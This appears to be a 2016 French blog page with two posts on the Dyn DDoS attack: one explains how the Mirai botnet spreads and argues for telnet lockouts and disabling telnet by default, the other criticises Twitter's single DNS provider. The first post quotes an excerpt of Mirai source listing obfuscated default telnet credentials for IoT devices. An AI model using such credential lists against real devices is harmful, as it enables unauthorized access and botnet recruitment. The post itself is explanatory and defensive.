XEROF

 

Attaque par déni de service (2)


Le code du botnet mirai a été mis en ligne (allez voir du côté d'un exégète de l'afnic), et il est vraiment très simple.

En deux temps,

- un ou plusieurs serveurs qui exécutent un script écrit en langage Go (qui se lit aussi facilement que du C) et qui cherche aléatoirement des proies sur internet identifiées par leurs adresses IP.

- à chaque fois, tentative de connection avec privilège maximum via telnet (qui suppose être actif) en utilisant un mot de passe parmi une cinquantaine prédéfinie :

add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
...

- puis, une fois rentré, utilisation du service pour exécuter des commandes HTTP type GET.


On le voit, ce truc qui défraie la chronique depuis maintenant presque un mois n'exploite aucune vulnérabilité de sécurité, mais uniquement la bétise, tellement énorme qu'on se demande si c'est intentionnel, bétise des constructeurs qui vendent des appareils à mettre en ligne en public sur internet avec un accès codé en dur, donc testable par n'importe qui de l'extérieur.

On le voit bien. Il suffirait qu'au bout de 3 échecs de connection avec un mauvais mot de passe l'appareil "attaqué" se bloque pour que le botnet mirai s'asphyxie et meurt lamentablement.

Ou mieux encore, désactiver telnet par défaut. Les constructeurs doivent vendre des produits sans telnet par défaut.

Mais non ça c'est trop demander !!

Posted on 24-October-2016 14:27 | Category: France | comment[0] | trackback[0]

 

Attaque par déni de service (1)


Ce week-end, Twitter était HS. Renseignement pris, auprès d'un registrar, voici les name servers de twitter :

Name Server: NS1.P34.DYNECT.NET
Name Server: NS2.P34.DYNECT.NET
Name Server: NS3.P34.DYNECT.NET
Name Server: NS4.P34.DYNECT.NET

Les name servers sont les enregistrements servis par tous les serveurs DNS de France et de navarre, dont ceux de Orange, Free et compagnie, et qui font que twitter.com dans un navigateur, ça part chez dynect. Ils pointent tous au même endroit, ce qui s'appelle un SPOF, single point of failure. C'est la b-a-ba du réseau, savoir qu'on ne met jamais tous ses oeufs dans le même panier. Incompétence crasse.

Posted on 24-October-2016 14:14 | Category: France | comment[0] | trackback[0]

 

 

<-- previous page

< October >
0102030405
0607080910
1112131415
1617181920
2122232425
2627282930
31



 

 

This site
Home
Articles

DevTools
CPU-Z
EditPlus
ExplorerXP
Kill.exe
OllyDbg
DependencyWalker
Process Explorer
autoruns.exe
Araxis
COM Trace injection
CodeStats
NetBrute
FileMon/Regmon
BoundsChecker
AQTime profiler
Source monitor
GDI leaks tracking
Rootkit revealer
Rootkit removal
RunAsLimitedUser(1)
RunAsLimitedUser(2)

 

 

Liens
Le Plan B
Un jour à Paris
Meneame
Rezo.net (aggr)
Reseau voltaire
Cuba solidarity project
Le grand soir
L'autre journal
Le courrier suisse
L'Orient, le jour
Agoravox (aggr)